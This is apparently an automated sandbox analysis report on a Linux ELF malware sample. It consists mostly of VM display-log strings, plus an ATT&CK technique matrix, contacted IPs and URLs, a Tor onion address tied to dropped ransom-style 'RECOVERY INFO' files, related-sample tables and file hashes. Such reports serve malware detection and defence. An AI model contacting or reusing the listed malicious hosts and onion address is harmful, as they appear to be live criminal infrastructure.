Source: Xorg.0.log.47.drBinary or memory string: [ 435.161] (==) vmware(0): Will set up a driver mode with dimensions 800x600.
Source: Xorg.0.log.47.drBinary or memory string: [ 436.824] (II) vmware(0): Modeline "1024x768"x75.0 78.75 1024 1040 1136 1312 768 769 772 800 +hsync +vsync (60.0 kHz d)
Source: Xorg.0.log.47.drBinary or memory string: [ 435.307] (II) vmware(0): Not using default mode "512x384" (bad mode clock/interlace/doublescan)
Source: Xorg.0.log.47.drBinary or memory string: [ 436.360] (II) vmware(0): Not using default mode "800x600" (bad mode clock/interlace/doublescan)
Source: Xorg.0.log.47.drBinary or memory string: [ 436.927] (**) vmware(0): Default mode "640x400": 31.5 MHz, 37.9 kHz, 85.1 Hz
Source: Xorg.0.log.47.drBinary or memory string: [ 436.497] (II) vmware(0): Not using default mode "840x525" (bad mode clock/interlace/doublescan)
Source: Xorg.0.log.47.drBinary or memory string: [ 436.415] (II) vmware(0): Not using default mode "576x432" (bad mode clock/interlace/doublescan)
Source: Xorg.0.log.47.drBinary or memory string: [ 435.207] (II) vmware(0): Not using default mode "320x200" (bad mode clock/interlace/doublescan)
Source: Xorg.0.log.47.drBinary or memory string: [ 436.578] (II) vmware(0): Not using default mode "640x360" (bad mode clock/interlace/doublescan)
Source: Xorg.0.log.47.drBinary or memory string: [ 436.546] (II) vmware(0): Not using default mode "432x243" (bad mode clock/interlace/doublescan)
Source: Xorg.0.log.47.drBinary or memory string: [ 436.678] (II) vmware(0): Not using default mode "5120x2880" (insufficient memory for mode)
Source: Xorg.0.log.47.drBinary or memory string: [ 436.882] (II) vmware(0): Modeline "800x600"x56.2 36.00 800 824 896 1024 600 601 603 625 +hsync +vsync (35.2 kHz d)
Source: Xorg.0.log.47.drBinary or memory string: [ 442.611] (II) config/udev: Adding input device VirtualPS/2 VMware VMMouse (/dev/input/event2)
Source: Xorg.0.log.47.drBinary or memory string: [ 436.816] (**) vmware(0): Default mode "1024x768": 94.5 MHz, 68.7 kHz, 85.0 Hz
Source: Xorg.0.log.47.drBinary or memory string: [ 436.924] (II) vmware(0): Modeline "720x400"x85.0 35.50 720 756 828 936 400 401 404 446 -hsync +vsync (37.9 kHz d)
Source: Xorg.0.log.47.drBinary or memory string: [ 437.088] (II) vmware(0): Initialized VMware Xinerama extension.
Source: Xorg.0.log.47.drBinary or memory string: [ 432.503] (II) vmware: driver for VMware SVGA: vmware0405, vmware0710
Source: Xorg.0.log.47.drBinary or memory string: [ 436.832] (**) vmware(0): Default mode "1024x768": 65.0 MHz, 48.4 kHz, 60.0 Hz
Source: Xorg.0.log.47.drBinary or memory string: [ 436.894] (II) vmware(0): Modeline "640x480"x85.0 36.00 640 696 752 832 480 481 484 509 -hsync -vsync (43.3 kHz d)
Source: Xorg.0.log.47.drBinary or memory string: [ 436.392] (II) vmware(0): Not using default mode "928x696" (bad mode clock/interlace/doublescan)
Source: Xorg.0.log.47.drBinary or memory string: [ 436.387] (II) vmware(0): Not using default mode "896x672" (bad mode clock/interlace/doublescan)
Source: Xorg.0.log.47.drBinary or memory string: [ 436.794] (II) vmware(0): Modeline "1152x864"x75.0 108.00 1152 1216 1344 1600 864 865 868 900 +hsync +vsync (67.5 kHz d)
Source: Xorg.0.log.47.drBinary or memory string: [ 435.221] (II) vmware(0): Not using default mode "320x240" (bad mode clock/interlace/doublescan)
Source: Xorg.0.log.47.drBinary or memory string: [ 436.531] (II) vmware(0): Not using default mode "320x180" (bad mode clock/interlace/doublescan)
Source: Xorg.0.log.47.drBinary or memory string: [ 435.086] (--) vmware(0): pbase: 0xe8000000
Source: Xorg.0.log.47.drBinary or memory string: [ 436.718] (II) vmware(0): Not using default mode "640x400" (bad mode clock/interlace/doublescan)
Source: Xorg.0.log.47.drBinary or memory string: [ 434.863] (--) vmware(0): VMware SVGA regs at (0x1070, 0x1071)
Source: Xorg.0.log.47.drBinary or memory string: [ 436.843] (**) vmware(0): Default mode "832x624": 57.3 MHz, 49.7 kHz, 74.6 Hz
Source: Xorg.0.log.47.drBinary or memory string: [ 436.456] (II) vmware(0): Not using default mode "700x525" (bad mode clock/interlace/doublescan)
Source: Xorg.0.log.47.drBinary or memory string: [ 444.459] (II) event3 - VirtualPS/2 VMware VMMouse: device removed
Source: Xorg.0.log.47.drBinary or memory string: [ 442.714] (**) VirtualPS/2 VMware VMMouse: (accel) selected scheme none/0
Source: Xorg.0.log.47.drBinary or memory string: [ 435.095] (--) vmware(0): mheig: 885
Source: Xorg.0.log.47.drBinary or memory string: [ 436.929] (II) vmware(0): Modeline "640x400"x85.1 31.50 640 672 736 832 400 401 404 445 -hsync +vsync (37.9 kHz d)
Source: Xorg.0.log.47.drBinary or memory string: [ 442.721] (**) VirtualPS/2 VMware VMMouse: (accel) acceleration threshold: 4
Source: Xorg.0.log.47.drBinary or memory string: [ 436.528] (II) vmware(0): Not using default mode "1024x768" (bad mode clock/interlace/doublescan)
Source: Xorg.0.log.47.drBinary or memory string: [ 436.373] (II) vmware(0): Not using default mode "1600x1200" (insufficient memory for mode)
Source: Xorg.0.log.47.drBinary or memory string: [ 436.856] (**) vmware(0): Default mode "800x600": 56.3 MHz, 53.7 kHz, 85.1 Hz
Source: Xorg.0.log.47.drBinary or memory string: [ 436.321] (II) vmware(0): Not using default mode "1280x960" (insufficient memory for mode)
Source: Xorg.0.log.47.drBinary or memory string: [ 436.848] (**) vmware(0): Default mode "960x540": 40.8 MHz, 33.5 kHz, 59.6 Hz
Source: Xorg.0.log.47.drBinary or memory string: [ 436.733] (II) vmware(0): Not using default mode "840x525" (bad mode clock/interlace/doublescan)
Source: Xorg.0.log.47.drBinary or memory string: [ 442.736] (II) event2 - VirtualPS/2 VMware VMMouse: is tagged by udev as: Mouse
Source: Xorg.0.log.47.drBinary or memory string: [ 436.777] (II) vmware(0): Modeline "1152x864"x100.0 143.47 1152 1232 1360 1568 864 865 868 915 -hsync +vsync (91.5 kHz d)
Source: Xorg.0.log.47.drBinary or memory string: [ 436.397] (II) vmware(0): Not using default mode "928x696" (bad mode clock/interlace/doublescan)
Source: Xorg.0.log.47.drBinary or memory string: [ 437.092] (II) vmware(0): vgaHWGetIOBase: hwp->IOBase is 0x03d0
Source: Xorg.0.log.47.drBinary or memory string: [ 436.720] (II) vmware(0): Not using default mode "1400x900" (insufficient memory for mode)
Source: Xorg.0.log.47.drBinary or memory string: [ 436.389] (II) vmware(0): Not using default mode "1856x1392" (insufficient memory for mode)
Source: Xorg.0.log.47.drBinary or memory string: [ 435.522] (II) vmware(0): Not using default mode "576x432" (bad mode clock/interlace/doublescan)
Source: Xorg.0.log.47.drBinary or memory string: [ 436.589] (II) vmware(0): Not using default mode "684x384" (bad mode clock/interlace/doublescan)
Source: Xorg.0.log.47.drBinary or memory string: [ 436.712] (II) vmware(0): Not using default mode "640x400" (bad mode clock/interlace/doublescan)
Source: Xorg.0.log.47.drBinary or memory string: [ 436.355] (II) vmware(0): Not using default mode "800x600" (bad mode clock/interlace/doublescan)
Source: Xorg.0.log.47.drBinary or memory string: [ 437.148] (==) vmware(0): Backing store enabled
Source: Xorg.0.log.47.drBinary or memory string: [ 436.675] (II) vmware(0): Not using default mode "2048x1152" (insufficient memory for mode)
Source: Xorg.0.log.47.drBinary or memory string: [ 436.338] (II) vmware(0): Not using default mode "1280x1024" (insufficient memory for mode)
Source: Xorg.0.log.47.drBinary or memory string: [ 436.680] (II) vmware(0): Not using default mode "2560x1440" (insufficient memory for mode)
Source: Xorg.0.log.47.drBinary or memory string: [ 432.373] (II) Loading /usr/lib/xorg/modules/drivers/vmware_drv.so
Source: Xorg.0.log.47.drBinary or memory string: [ 436.761] (II) vmware(0): Not using default mode "2560x1600" (insufficient memory for mode)
Source: Xorg.0.log.47.drBinary or memory string: [ 436.891] (**) vmware(0): Default mode "640x480": 36.0 MHz, 43.3 kHz, 85.0 Hz
Source: Xorg.0.log.47.drBinary or memory string: [ 436.802] (II) vmware(0): Modeline "1152x864"x75.0 104.99 1152 1224 1352 1552 864 865 868 902 -hsync +vsync (67.6 kHz d)
Source: Xorg.0.log.47.drBinary or memory string: [ 436.909] (**) vmware(0): Default mode "640x480": 25.2 MHz, 31.5 kHz, 59.9 Hz
Source: Xorg.0.log.47.drBinary or memory string: [ 436.607] (II) vmware(0): Not using default mode "1920x1080" (insufficient memory for mode)
Source: Xorg.0.log.47.drBinary or memory string: [ 442.658] (II) event2 - VirtualPS/2 VMware VMMouse: is tagged by udev as: Mouse
Source: Xorg.0.log.47.drBinary or memory string: [ 436.349] (II) vmware(0): Not using default mode "640x512" (bad mode clock/interlace/doublescan)
Source: Xorg.0.log.47.drBinary or memory string: [ 436.464] (II) vmware(0): Not using default mode "1440x900" (insufficient memory for mode)
Source: Xorg.0.log.47.drBinary or memory string: [ 436.683] (II) vmware(0): Not using default mode "5120x2880" (insufficient memory for mode)
Source: Xorg.0.log.47.drBinary or memory string: [ 435.265] (II) vmware(0): Not using default mode "400x300" (bad mode clock/interlace/doublescan)
Source: Xorg.0.log.47.drBinary or memory string: [ 436.505] (II) vmware(0): Not using default mode "1920x1200" (insufficient memory for mode)
Source: Xorg.0.log.47.drBinary or memory string: [ 436.755] (II) vmware(0): Not using default mode "2560x1600" (insufficient memory for mode)
Source: Xorg.0.log.47.drBinary or memory string: [ 435.132] (==) vmware(0): RGB weight 888
Source: Xorg.0.log.47.drBinary or memory string: [ 436.670] (II) vmware(0): Not using default mode "2048x1152" (insufficient memory for mode)
Source: Xorg.0.log.47.drBinary or memory string: [ 436.876] (II) vmware(0): Modeline "800x600"x60.3 40.00 800 840 968 1056 600 601 605 628 +hsync +vsync (37.9 kHz d)
Source: Xorg.0.log.47.drBinary or memory string: [ 442.622] (**) VirtualPS/2 VMware VMMouse: always reports core events
Source: Xorg.0.log.47.drBinary or memory string: [ 435.082] (--) vmware(0): vram: 4194304
Source: Xorg.0.log.47.drBinary or memory string: [ 436.766] (II) vmware(0): Virtual size is 800x600 (pitch 1176)
Source: Xorg.0.log.47.drBinary or memory string: [ 436.584] (II) vmware(0): Not using default mode "684x384" (bad mode clock/interlace/doublescan)
Source: Xorg.0.log.47.drBinary or memory string: [ 442.573] (II) event3 - VirtualPS/2 VMware VMMouse: is tagged by udev as: Mouse
Source: Xorg.0.log.47.drBinary or memory string: [ 436.573] (II) vmware(0): Not using default mode "640x360" (bad mode clock/interlace/doublescan)
Source: Xorg.0.log.47.drBinary or memory string: [ 436.431] (II) vmware(0): Not using default mode "680x384" (bad mode clock/interlace/doublescan)
Source: Xorg.0.log.47.drBinary or memory string: [ 436.673] (II) vmware(0): Not using default mode "4096x2304" (insufficient memory for mode)
Source: Xorg.0.log.47.drBinary or memory string: [ 436.581] (II) vmware(0): Not using default mode "1368x768" (insufficient memory for mode)
Source: Xorg.0.log.47.drBinary or memory string: [ 432.407] (II) Module vmware: vendor="X.Org Foundation"
Source: Xorg.0.log.47.drBinary or memory string: [ 436.774] (**) vmware(0): Default mode "1152x864": 143.5 MHz, 91.5 kHz, 100.0 Hz
Source: Xorg.0.log.47.drBinary or memory string: [ 435.230] (II) vmware(0): Not using default mode "320x240" (bad mode clock/interlace/doublescan)
Source: Xorg.0.log.47.drBinary or memory string: [ 435.074] (--) vmware(0): depth: 24
Source: Xorg.0.log.47.drBinary or memory string: [ 436.791] (**) vmware(0): Default mode "1152x864": 108.0 MHz, 67.5 kHz, 75.0 Hz
Source: Xorg.0.log.47.drBinary or memory string: [ 436.643] (II) vmware(0): Not using default mode "3200x1800" (insufficient memory for mode)
Source: Xorg.0.log.47.drBinary or memory string: [ 436.667] (II) vmware(0): Not using default mode "4096x2304" (insufficient memory for mode)
Source: Xorg.0.log.47.drBinary or memory string: [ 436.533] (II) vmware(0): Not using default mode "320x180" (bad mode clock/interlace/doublescan)
Source: Xorg.0.log.47.drBinary or memory string: [ 436.826] (**) vmware(0): Default mode "1024x768": 75.0 MHz, 56.5 kHz, 70.1 Hz
Source: Xorg.0.log.47.drBinary or memory string: [ 436.467] (II) vmware(0): Not using default mode "720x450" (bad mode clock/interlace/doublescan)
Source: Xorg.0.log.47.drBinary or memory string: [ 435.310] (II) vmware(0): Not using default mode "512x384" (bad mode clock/interlace/doublescan)
Source: Xorg.0.log.47.drBinary or memory string: [ 436.686] (II) vmware(0): Not using default mode "2560x1440" (insufficient memory for mode)
Source: Xorg.0.log.47.drBinary or memory string: [ 436.515] (II) vmware(0): Not using default mode "2048x1536" (insufficient memory for mode)
Source: Xorg.0.log.47.drBinary or memory string: [ 436.341] (II) vmware(0): Not using default mode "640x512" (bad mode clock/interlace/doublescan)
Source: Xorg.0.log.47.drBinary or memory string: [ 436.554] (II) vmware(0): Not using default mode "960x540" (monitor doesn't support reduced blanking)
Source: Xorg.0.log.47.drBinary or memory string: [ 436.599] (II) vmware(0): Not using default mode "800x450" (bad mode clock/interlace/doublescan)
Source: Xorg.0.log.47.drBinary or memory string: [ 442.700] (II) XINPUT: Adding extended input device "VirtualPS/2 VMware VMMouse" (type: MOUSE, id 9)
Source: Xorg.0.log.47.drBinary or memory string: [ 436.343] (II) vmware(0): Not using default mode "1280x1024" (insufficient memory for mode)
Source: Xorg.0.log.47.drBinary or memory string: [ 436.562] (II) vmware(0): Not using default mode "1024x576" (monitor doesn't support reduced blanking)
Source: Xorg.0.log.47.drBinary or memory string: [ 436.699] (II) vmware(0): Not using default mode "15360x8640" (insufficient memory for mode)
Source: Xorg.0.log.47.drBinary or memory string: [ 436.758] (II) vmware(0): Not using default mode "1280x800" (width requires unsupported line pitch)
Source: Xorg.0.log.47.drBinary or memory string: [ 436.941] (II) vmware(0): Modeline "640x360"x59.3 17.75 640 688 720 800 360 363 368 374 +hsync -vsync (22.2 kHz d)
Source: Xorg.0.log.47.drBinary or memory string: [ 436.477] (II) vmware(0): Not using default mode "840x525" (bad mode clock/interlace/doublescan)
Source: Xorg.0.log.47.drBinary or memory string: [ 436.780] (**) vmware(0): Default mode "1152x864": 121.5 MHz, 77.5 kHz, 85.1 Hz
Source: Xorg.0.log.47.drBinary or memory string: [ 436.418] (II) vmware(0): Not using default mode "576x432" (bad mode clock/interlace/doublescan)
Source: Xorg.0.log.47.drBinary or memory string: [ 435.124] (==) vmware(0): Depth 24, (==) framebuffer bpp 32
Source: Xorg.0.log.47.drBinary or memory string: [ 436.696] (II) vmware(0): Not using default mode "3840x2160" (insufficient memory for mode)
Source: Xorg.0.log.47.drBinary or memory string: [ 436.576] (II) vmware(0): Not using default mode "1280x720" (width requires unsupported line pitch)
Source: Xorg.0.log.47.drBinary or memory string: [ 437.163] (II) vmware(0): Initialized VMware Xv extension successfully.
Source: Xorg.0.log.47.drBinary or memory string: [ 436.662] (II) vmware(0): Not using default mode "3840x2160" (insufficient memory for mode)
Source: Xorg.0.log.47.drBinary or memory string: [ 434.858] (WW) vmware(0): Disabling Render Acceleration.
Source: Xorg.0.log.47.drBinary or memory string: [ 436.938] (**) vmware(0): Default mode "640x360": 17.8 MHz, 22.2 kHz, 59.3 Hz
Source: Xorg.0.log.47.drBinary or memory string: [ 436.459] (II) vmware(0): Not using default mode "1400x1050" (insufficient memory for mode)
Source: Xorg.0.log.47.drBinary or memory string: [ 436.871] (II) vmware(0): Modeline "800x600"x72.2 50.00 800 856 976 1040 600 637 643 666 +hsync +vsync (48.1 kHz d)
Source: Xorg.0.log.47.drBinary or memory string: [ 436.813] (II) vmware(0): Modeline "1152x864"x60.0 81.62 1152 1216 1336 1520 864 865 868 895 -hsync +vsync (53.7 kHz d)
Source: Xorg.0.log.47.drBinary or memory string: [ 436.868] (**) vmware(0): Default mode "800x600": 50.0 MHz, 48.1 kHz, 72.2 Hz
Source: Xorg.0.log.47.drBinary or memory string: [ 436.512] (II) vmware(0): Not using default mode "960x720" (bad mode clock/interlace/doublescan)

Language, Device and Operating System Detection

Source: /usr/lib/accountsservice/accounts-daemon (PID: 6321) Logged in records file read: /var/log/wtmp
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | 1 Scripting | Valid Accounts | Windows Management Instrumentation | 1 Scripting | Path Interception | 1 Hide Artifacts | 1 OS Credential Dumping | 11 Security Software Discovery | Remote Services | Data from Local System | 1 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
Credentials | Domains | Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | 1 File and Directory Permissions Modification | LSASS Memory | 1 System Owner/User Discovery | Remote Desktop Protocol | Data from Removable Media | 1 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | Logon Script (Windows) | 1 Hidden Files and Directories | Security Account Manager | 1 System Network Configuration Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | 3 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 1 Indicator Removal | NTDS | 11 File and Directory Discovery | Distributed Component Object Model | Input Capture | 4 Application Layer Protocol | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | Software Packing | LSA Secrets | 3 System Information Discovery | SSH | Keylogging | 1 Proxy | Scheduled Transfer | Data Encrypted for Impact
No configs have been found
[Behavior graph: ID 1548498, Sample: Zc9eO57fgF.elf, Start date: 04/11/2024, Architecture: LINUX, Score: 52]
Source | Detection | Scanner | Label | Link
Zc9eO57fgF.elf | 0% | ReversingLabs | |

No Antivirus matches
No Antivirus matches

Source | Detection | Scanner | Label | Link
http://193.143.1.139/Ujdu8jjooue/biweax.php | 0% | Avira URL Cloud | safe |
https://gcc.gnu.org/bugsNSt7__cxx1115basic_stringbufIcSt11char_traitsIcESaIcEEE | 0% | Avira URL Cloud | safe |
http://193.143.1.139/Ujdu8jjoouehttp://api.ipify | 0% | Avira URL Cloud | safe |
http://193.143.1.139/Ujdu8jjooue/biweax.phpYour | 0% | Avira URL Cloud | safe |
http://weaxorpemwzoxg5cdvvfd77p3qczkxqii37ww4foo2n4jcft3mytbpyd.onion/lsaHqOhaJLOyrWSPvtJajdzqrftqzO | 0% | Avira URL Cloud | safe |

Name | IP | Active | Malicious | Antivirus Detection | Reputation
api.ipify.org | 172.67.74.152 | true | false | | unknown

Name | Malicious | Antivirus Detection | Reputation
http://api.ipify.org/ | false | | high
http://193.143.1.139/Ujdu8jjooue/biweax.php | false | Avira URL Cloud: safe | unknown

Name | Source | Malicious | Antivirus Detection | Reputation
http://193.143.1.139/Ujdu8jjoouehttp://api.ipify | Zc9eO57fgF.elf | false | Avira URL Cloud: safe | unknown
https://gcc.gnu.org/bugsNSt7__cxx1115basic_stringbufIcSt11char_traitsIcESaIcEEENSt7__cxx1119basic_is | Zc9eO57fgF.elf | false | | high
http://weaxorpemwzoxg5cdvvfd77p3qczkxqii37ww4foo2n4jcft3mytbpyd.onion/lsaHqOhaJLOyrWSPvtJajdzqrftqzO | Zc9eO57fgF.elf, RECOVERY INFO.txt4.12.dr, RECOVERY INFO.txt13.12.dr, RECOVERY INFO.txt7.12.dr, RECOVERY INFO.txt2.12.dr, RECOVERY INFO.txt8.12.dr, RECOVERY INFO.txt.12.dr, RECOVERY INFO.txt10.12.dr, RECOVERY INFO.txt11.12.dr, RECOVERY INFO.txt0.12.dr, RECOVERY INFO.txt5.12.dr, RECOVERY INFO.txt1.12.dr, RECOVERY INFO.txt3.12.dr, RECOVERY INFO.txt9.12.dr, RECOVERY INFO.txt6.12.dr, RECOVERY INFO.txt12.12.dr | true | Avira URL Cloud: safe | unknown
http://wiki.x.org | Xorg.0.log.47.dr | false | | high
https://gcc.gnu.org/bugsNSt7__cxx1115basic_stringbufIcSt11char_traitsIcESaIcEEE | Zc9eO57fgF.elf | false | Avira URL Cloud: safe | unknown
http://193.143.1.139/Ujdu8jjooue/biweax.phpYour | Zc9eO57fgF.elf | false | Avira URL Cloud: safe | unknown
http://www.ubuntu.com/support) | Xorg.0.log.47.dr | false | | high

IP | Domain | Country | Flag | ASN | ASN Name | Malicious
193.143.1.139 | unknown | unknown | | 57271 | BITWEB-ASRU | false
109.202.202.202 | unknown | Switzerland | | 13030 | INIT7CH | false
91.189.91.43 | unknown | United Kingdom | | 41231 | CANONICAL-ASGB | false
172.67.74.152 | api.ipify.org | United States | | 13335 | CLOUDFLARENETUS | false
91.189.91.42 | unknown | United Kingdom | | 41231 | CANONICAL-ASGB | false

Match | Associated Sample Name / URL | Detection | Threat Name | Context
109.202.202.202 | kpLwzBouH4.elf | malicious | Unknown | ch.archive.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_92.0%2bbuild3-0ubuntu0.20.04.1_amd64.deb
91.189.91.43 | main_m68k.elf | malicious | Mirai |
91.189.91.43 | main_sh4.elf | malicious | Mirai |
91.189.91.43 | tftp.elf | malicious | Unknown |
91.189.91.43 | Mozi.m | malicious | Unknown |
91.189.91.43 | main_arm6.elf | malicious | Mirai |
91.189.91.43 | main_mips.elf | malicious | Mirai |
91.189.91.43 | main_arm.elf | malicious | Mirai |
91.189.91.43 | i586.elf | malicious | Gafgyt, Mirai |
91.189.91.43 | x86_64.elf | malicious | Gafgyt, Mirai |
91.189.91.43 | armv4l.elf | malicious | Gafgyt, Mirai |
172.67.74.152 | 67065b4c84713_Javiles.exe | malicious | RDPWrap Tool | api.ipify.org/
172.67.74.152 | Yc9hcFC1ux.exe | malicious | Unknown | api.ipify.org/
172.67.74.152 | 4F08j2Rmd9.bin | malicious | Xmrig | api.ipify.org/
172.67.74.152 | y8tCHz7CwC.bin | malicious | Xmrig | api.ipify.org/
172.67.74.152 | file.exe | malicious | Unknown | api.ipify.org/
172.67.74.152 | file.exe | malicious | Unknown | api.ipify.org/
172.67.74.152 | file.exe | malicious | LummaC, PrivateLoader, Stealc, Vidar | api.ipify.org/
172.67.74.152 | file.exe | malicious | RDPWrap Tool | api.ipify.org/
172.67.74.152 | Prismifyr-Install.exe | malicious | Node Stealer | api.ipify.org/
172.67.74.152 | 2zYP8qOYmJ.exe | malicious | Unknown | api.ipify.org/

Match | Associated Sample Name / URL | Detection | Threat Name | Context
api.ipify.org | Payslip_October_2024_pdf.exe | malicious | AgentTesla | 172.67.74.152
api.ipify.org | Quotation.exe | malicious | AgentTesla | 104.26.13.205
api.ipify.org | Copia de pago de la Orden de compra OI16014 y OI16015.exe | malicious | AgentTesla | 104.26.12.205
api.ipify.org | QUOTATION#09678.exe | malicious | AgentTesla | 172.67.74.152
api.ipify.org | Payslip_October_2024_pdf.exe | malicious | AgentTesla | 104.26.13.205
api.ipify.org | V7FWuG5Lct.exe | malicious | Quasar | 172.67.74.152
api.ipify.org | 7ll96oOSBF.exe | malicious | Quasar | 104.26.12.205
api.ipify.org | Payload 94.75 (4).225.exe | malicious | Kronos, Strela Stealer | 104.26.12.205
api.ipify.org | Ordine d'acquisto OI16014 e OI1601.exe | malicious | AgentTesla | 104.26.12.205
api.ipify.org | https://v90hdblg6c012.b-cdn.net/ppo45-fill-captch.html | malicious | LummaC | 104.26.12.205

Match | Associated Sample Name / URL | Detection | Threat Name | Context
CANONICAL-ASGB | main_m68k.elf | malicious | Mirai | 91.189.91.42
CANONICAL-ASGB | main_sh4.elf | malicious | Mirai | 91.189.91.42
CANONICAL-ASGB | tftp.elf | malicious | Unknown | 91.189.91.42
CANONICAL-ASGB | Mozi.m | malicious | Unknown | 91.189.91.42
CANONICAL-ASGB | main_arm6.elf | malicious | Mirai | 91.189.91.42
CANONICAL-ASGB | main_mips.elf | malicious | Mirai | 91.189.91.42
CANONICAL-ASGB | main_arm.elf | malicious | Mirai | 91.189.91.42
CANONICAL-ASGB | i586.elf | malicious | Gafgyt, Mirai | 91.189.91.42
CANONICAL-ASGB | x86_64.elf | malicious | Gafgyt, Mirai | 91.189.91.42
CANONICAL-ASGB | armv4l.elf | malicious | Gafgyt, Mirai | 91.189.91.42
INIT7CH | main_m68k.elf | malicious | Mirai | 109.202.202.202
INIT7CH | main_sh4.elf | malicious | Mirai | 109.202.202.202
INIT7CH | tftp.elf | malicious | Unknown | 109.202.202.202
INIT7CH | Mozi.m | malicious | Unknown | 109.202.202.202
INIT7CH | main_arm6.elf | malicious | Mirai | 109.202.202.202
INIT7CH | main_mips.elf | malicious | Mirai | 109.202.202.202
INIT7CH | main_arm.elf | malicious | Mirai | 109.202.202.202
INIT7CH | i586.elf | malicious | Gafgyt, Mirai | 109.202.202.202
INIT7CH | x86_64.elf | malicious | Gafgyt, Mirai | 109.202.202.202
INIT7CH | armv4l.elf | malicious | Gafgyt, Mirai | 109.202.202.202
BITWEB-ASRU | https://caraccidentdefencelawyer.com/LBKQgs7C#3l3f816z5y810bbd3w5muypm6py7liz04w39 | malicious | GRQ Scam | 193.143.1.195
BITWEB-ASRU | mips.nn.elf | malicious | Mirai, Okiru | 193.143.1.59
BITWEB-ASRU | IWnUKXop2x.elf | malicious | Mirai, Okiru | 193.143.1.59
BITWEB-ASRU | LNLAncf2v5.elf | malicious | Mirai, Okiru | 193.143.1.59
BITWEB-ASRU | x86_64.nn.elf | malicious | Mirai, Okiru | 193.143.1.59
BITWEB-ASRU | x86_32.nn.elf | malicious | Mirai, Okiru | 193.143.1.59
BITWEB-ASRU | arm7.nn.elf | malicious | Mirai, Okiru | 193.143.1.59
BITWEB-ASRU | arm.nn.elf | malicious | Mirai, Okiru | 193.143.1.59
BITWEB-ASRU | h3G4uG7Kqi.elf | malicious | Mirai | 45.133.217.107
BITWEB-ASRU | 4Y8rbNhkaR.elf | malicious | Mirai, Okiru | 193.143.1.59
CLOUDFLARENETUS | Quote_General_Tech_LLC_637673,PDF.exe | malicious | FormBook | 188.114.96.3
CLOUDFLARENETUS | file.exe | malicious | LummaC, Stealc, Vidar | 104.21.5.155
CLOUDFLARENETUS | e-dekont.exe | malicious | Snake Keylogger | 188.114.96.3
CLOUDFLARENETUS | jCN22OTVxq.lnk | malicious | Unknown | 104.21.73.244
CLOUDFLARENETUS | Cxn80OsiM7.lnk | malicious | Unknown | 104.21.73.244
CLOUDFLARENETUS | r96vfq6E6O.lnk | malicious | Unknown | 172.67.193.120
CLOUDFLARENETUS | MvUoLtpUWG.lnk | malicious | Unknown | 172.67.193.120
CLOUDFLARENETUS | IFeOeQQTXe.lnk | malicious | Unknown | 172.67.193.120
CLOUDFLARENETUS | JyQcnZpmqD.lnk | malicious | Unknown | 104.21.73.244
CLOUDFLARENETUS | LPIJdxU8Sf.lnk | malicious | Unknown | 172.67.193.120
                                No context
                                No context
                                Process:/usr/bin/pulseaudio
                                File Type:ASCII text
                                Category:dropped
                                Size (bytes):10
                                Entropy (8bit):2.9219280948873623
                                Encrypted:false
                                SSDEEP:3:5bkPn:pkP
                                MD5:FF001A15CE15CF062A3704CEA2991B5F
                                SHA1:B06F6855F376C3245B82212AC73ADED55DFE5DEF
                                SHA-256:C54830B41ECFA1B6FBDC30397188DDA86B7B200E62AEAC21AE694A6192DCC38A
                                SHA-512:65EBF7C31F6F65713CE01B38A112E97D0AE64A6BD1DA40CE4C1B998F10CD3912EE1A48BB2B279B24493062118AAB3B8753742E2AF28E56A31A7AAB27DE80E7BF
                                Malicious:false
                                Reputation:moderate, very likely benign file
                                Preview:auto_null.
                                Process:/usr/bin/pulseaudio
                                File Type:ASCII text
                                Category:dropped
                                Size (bytes):18
                                Entropy (8bit):3.4613201402110088
                                Encrypted:false
                                SSDEEP:3:5bkrIZsXvn:pkckv
                                MD5:28FE6435F34B3367707BB1C5D5F6B430
                                SHA1:EB8FE2D16BD6BBCCE106C94E4D284543B2573CF6
                                SHA-256:721A37C69E555799B41D308849E8F8125441883AB021B723FED90A9B744F36C0
                                SHA-512:6B6AB7C0979629D0FEF6BE47C5C6BCC367EDD0AAE3FC973F4DE2FD5F0A819C89E7656DB65D453B1B5398E54012B27EDFE02894AD87A7E0AF3A9C5F2EB24A9919
                                Malicious:false
                                Reputation:moderate, very likely benign file
                                Preview:auto_null.monitor.
                                Process:/usr/bin/dbus-daemon
                                File Type:very short file (no magic)
                                Category:dropped
                                Size (bytes):1
                                Entropy (8bit):0.0
                                Encrypted:false
                                SSDEEP:3:V:V
                                MD5:CFCD208495D565EF66E7DFF9F98764DA
                                SHA1:B6589FC6AB0DC82CF12099D1C2D40AB994E8410C
                                SHA-256:5FECEB66FFC86F38D952786C6D696C79C2DBC239DD4E91B46729D73A27FB57E9
                                SHA-512:31BCA02094EB78126A517B206A88C73CFA9EC6F704C7030D18212CACE820F025F00BF0EA68DBF3F3A5436CA63B53BF7BF80AD8D5DE7D8359D0B7FED9DBC3AB99
                                Malicious:false
                                Reputation:high, very likely benign file
                                Preview:0
                                Process:/tmp/Zc9eO57fgF.elf
                                File Type:data
                                Category:dropped
                                Size (bytes):140
                                Entropy (8bit):5.730391958884377
                                Encrypted:false
                                SSDEEP:3:1r3ll/lsl5llb2FTspRKg9tP3d9jKqkzlazrT31zAn:1eGIpRR9j92qkcj31E
                                MD5:1AD272920CB8C3E6AFFF3B4F1F96A131
                                SHA1:59B99637A79A29535AD30E30C1D97F4EA07C3478
                                SHA-256:FB2BAC83ED7AE5B8626B2874F044A4AE33243BB7B743604027B1F3F06E92A50A
                                SHA-512:6A6238E8D2F07618A767BBE83A72E076FA9A42DF7845E182B852B3EB79EB21493F650FD3242DEB043022BA7F75E292BF981E389DCA4DE7D5509D4D91BA162457
                                Malicious:false
                                Reputation:low
                                Preview:.57..!2A........(............................1S=]7:.Tf..$8h..`\..%.a....c8.<I.OI.y..u].-.'.!.....w.$ ,...WRD...&..}{..?.X.#..6..../Q.D3$.
